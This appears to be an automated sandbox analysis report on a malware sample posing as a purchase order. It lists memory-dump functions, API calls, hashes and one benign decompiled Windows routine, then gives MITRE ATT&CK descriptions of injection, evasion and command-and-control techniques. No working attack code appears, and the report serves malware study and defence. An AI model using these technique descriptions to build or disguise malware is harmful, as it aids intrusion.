Function 03959540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0395954A

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3e2955d3e16855c216e6d43413c61786d93e2842f06c83b4adb4e8cd4c36011
Instruction ID: c45b7a358484ec913413ceaf2ba4d3ecfbe5b9a9ccbed5ca339f44ea0abc1cf9
Opcode Fuzzy Hash: c3e2955d3e16855c216e6d43413c61786d93e2842f06c83b4adb4e8cd4c36011
Instruction Fuzzy Hash: 62900265312148030105E55A0704507008697D5391391C021F1105550CDB6588616161

Uniqueness

Uniqueness Score: -1.00%

Function 02DE68C0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02DE6968

Strings

net.dll, xrefs: 02DE6931, 02DE69B7, 02DE698F, 02DE699B, 02DE69C3
wininet.dll, xrefs: 02DE691E, 02DE6927

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: bc18748a33a9e030f66fd2e36009c6e9db07ea1429afa165c49bff7f197d6325
Instruction ID: 71068ab522f9a3e98c31aeeaa6a9410b390d12b33ea27bff5c142c737564b38d
Opcode Fuzzy Hash: bc18748a33a9e030f66fd2e36009c6e9db07ea1429afa165c49bff7f197d6325
Instruction Fuzzy Hash: 80316CB5500744ABCB14EF64CC84FABB7B9EB98704F00852DE66A9B344DB70E950CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 02DE68B6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02DE6968

Strings

net.dll, xrefs: 02DE6931, 02DE698F, 02DE699B
wininet.dll, xrefs: 02DE691E, 02DE6927

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: fe56b8178ae62d234baab678795bd56be17600d09520113c7cb8969899b41f71
Instruction ID: 33357b43275309c3830114121bf759a95505f84a5cccb967769927c859bfa791
Opcode Fuzzy Hash: fe56b8178ae62d234baab678795bd56be17600d09520113c7cb8969899b41f71
Instruction Fuzzy Hash: 97318EB1500744ABDB14EF64CC84FABB7A9EB98704F00806DE66A5B341DB70E850CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7EA2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DD3B93), ref: 02DE7EDD

Strings

.z`, xrefs: 02DE7ECC, 02DE7ED8

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 53266be44d7de86cae5244340a044c31d2f7d4ccb8494e733b6cf42abc58f076
Instruction ID: 9d5267e9757dd0648a73b39bbdafd08db2a33c95f354dd08716fbe40144d2877
Opcode Fuzzy Hash: 53266be44d7de86cae5244340a044c31d2f7d4ccb8494e733b6cf42abc58f076
Instruction Fuzzy Hash: F8E0EDB22006006BCB14EF64CC44EE7376AAF84360F154699F9199B312C131E8008FB1

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7EB0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DD3B93), ref: 02DE7EDD

Strings

.z`, xrefs: 02DE7ECC, 02DE7ED8

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 448d90856b6fd6f0ac75a7d1ed0d6e0455606bb499ea7c696575a8f8e142dc09
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 94E046B5210208ABDB18EF99CC49EA777ADEF88750F018598FE099B351C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02DD6EB0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DD6F0A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DD6F2B

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: dc3ba57f29cad83f4c74190252de1a17939ff0c5820657c3f7100e7e8044d768
Instruction ID: 2fb57d7d6f7e890107fb5d660902fc94f437ffc25a306095861f3a2c10842a57
Opcode Fuzzy Hash: dc3ba57f29cad83f4c74190252de1a17939ff0c5820657c3f7100e7e8044d768
Instruction Fuzzy Hash: B701F771A8062877EB20BA949C02FFE772CDB04B50F144019FF04BA2C0E6956D058AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02DD9900, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DD9972

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
Instruction ID: a3c1f9d4a4b8f23e5712d1570299161d7b6891ee22228fd6a6448c8099ca066d
Opcode Fuzzy Hash: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
Instruction Fuzzy Hash: 6601DEB5E4020EABDF10EAA4DC51FDDB779AB54308F004195A90997241F671EB54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7F20, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DE7F74

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: e3ac3eadfcc77d7dbfa7ff79d3f6d14674203070d7391cb737c4f038646c63e3
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 1B01AFB2210108ABCB54DF89DC80EEB77AEAF8C754F158258BA0D97250C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DE69F0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DDCA10,?,?), ref: 02DE6A2C

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e6fffc096a2db29b2fc3fb44f3d652056e80c1857a2d27424bfde3dad46471f4
Instruction ID: 135a0dbe27eb3198c50de7142d7fd5306d5039e6b1e461b8415e5c6e1a27ec9b
Opcode Fuzzy Hash: e6fffc096a2db29b2fc3fb44f3d652056e80c1857a2d27424bfde3dad46471f4
Instruction Fuzzy Hash: F2E06D737902043AE6207599AC02FA7B29CCB91B61F540066FA0EEB2C0D595F80146E9

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7F7A, Relevance: 1.5, APIs: 1, Instructions: 35processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DE7F74

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 649661dbbcc5ce3d0dd600770536551658eb79619c738f093dbb96d38e31b225
Instruction ID: 4e8403bc8ca7128bd7be1da86fa5a2404363aa195796cdf2477c0d1841265b25
Opcode Fuzzy Hash: 649661dbbcc5ce3d0dd600770536551658eb79619c738f093dbb96d38e31b225
Instruction Fuzzy Hash: 04F058B6240214AFDB24EF94DC81EEB73ADEF88360F108559F9099B291C630E8118BF1

Uniqueness

Uniqueness Score: -1.00%

Function 02DE8010, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02DDCCD2,02DDCCD2,?,00000000,?,?), ref: 02DE8040

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: aea9bfe8622038176ff6c78d8c398bb1b6eff04ac1072e0370a722e90128faa8
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 1CE01AB5200208ABDB10EF49CC85EE737ADEF88650F018554BA0957241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02DDD138, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02DD78B3,?), ref: 02DDD16B

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 6751546a2e3cdcb51b190afe3ad7f57296b9ba61db38396732dc48e375eebbb4
Instruction ID: e1dd5ac6a06e7e25dd2bf645047a3beec343215449802ff08ec2d4cdb98328da
Opcode Fuzzy Hash: 6751546a2e3cdcb51b190afe3ad7f57296b9ba61db38396732dc48e375eebbb4
Instruction Fuzzy Hash: CAE0C2726403043AEB20EEB88C96FAA77A69F54B40F0801A4F48AD7383D920D002C520

Uniqueness

Uniqueness Score: -1.00%

Function 02DDD140, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02DD78B3,?), ref: 02DDD16B

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: fc3aa382f1ca126d7b5c13840b0101a96bc9fe2aff3cd1676ce3d9546b1423f1
Instruction ID: 46435dbd800f3802496f00221ee5e8b83c0d6d92e19f922cc36ced3805531aff
Opcode Fuzzy Hash: fc3aa382f1ca126d7b5c13840b0101a96bc9fe2aff3cd1676ce3d9546b1423f1
Instruction Fuzzy Hash: A9D0A7727503043BEA10FAA48C03F3732CD9B44B44F4900A4F949D73C3D950E4008571

Uniqueness

Uniqueness Score: -1.00%

Function 0395967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03959694

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aba679889026b3b4e7256217b6e4204e00c3d9eb4f14b8f81906bd68d823aa2d
Instruction ID: 92c52f527dda51a7df8470329e198238281c1a0fe9f862d006d5aabb50840c87
Opcode Fuzzy Hash: aba679889026b3b4e7256217b6e4204e00c3d9eb4f14b8f81906bd68d823aa2d
Instruction Fuzzy Hash: F7B09B719035C9C5E611E7614608717794477D0745F56C051E1120641B477CC0D5F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 039AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E039AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0395CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E039A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E039A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x039afdda
0x039afde2
0x039afde5
0x039afdec
0x039afdfa
0x039afdff
0x039afe0a
0x039afe0f
0x039afe17
0x039afe1e
0x039afe19
0x039afe19
0x039afe19
0x039afe20
0x039afe21
0x039afe22
0x039afe25
0x039afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039AFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039AFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039AFE01

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 8be49a4b363fb3ad99c3adb142428dc4ed0855d1fe9fe5acb53b800c0e55b93e
Instruction ID: a38d5f925fa2be46122a6a221f36bd09516e708049559244006427161af06954
Opcode Fuzzy Hash: 8be49a4b363fb3ad99c3adb142428dc4ed0855d1fe9fe5acb53b800c0e55b93e
Instruction Fuzzy Hash: BEF0F636240601BFDA209A49DC06F37BF5AEB85730F250315F6685A1D1EA62F860C7F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Purchase Order 40,7045.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 00861FA0, Relevance: 29.9, APIs: 4, Strings: 13, Instructions: 132
memorythreadCOMMON

Function 00866FE0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85
COMMON

Function 008610C0, Relevance: 7.5, APIs: 5, Instructions: 39
COMMON

Function 008720DD, Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Function 00868AEE, Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Function 008772AC, Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Function 00868B39, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Function 008689F3, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 008754E7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
COMMON

Function 0086BEA1, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Function 00871C5F, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00876BF0, Relevance: .4, Instructions: 355
COMMONCrypto

Function 00876808, Relevance: .3, Instructions: 349
COMMONCrypto

Function 00876436, Relevance: .3, Instructions: 332
COMMONCrypto

Function 00876098, Relevance: .3, Instructions: 326
COMMONCrypto

Function 0086A7E0, Relevance: .1, Instructions: 76
COMMONCrypto

Function 00870D9B, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Function 008614E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 69
COMMON

Function 00868A33, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
COMMON

Function 008674B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94
COMMON

Function 008675D0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94
COMMON

Function 008676F0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94
COMMON

Function 00870B25, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
COMMON

Function 00866C90, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93
COMMON

Function 00865C90, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90
COMMON

Function 0086BF9A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMON

Function 00863F30, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 469
COMMON

Function 0086DF4D, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Function 0087275F, Relevance: 9.0, APIs: 6, Instructions: 47
COMMON

Function 00865AE0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104
COMMON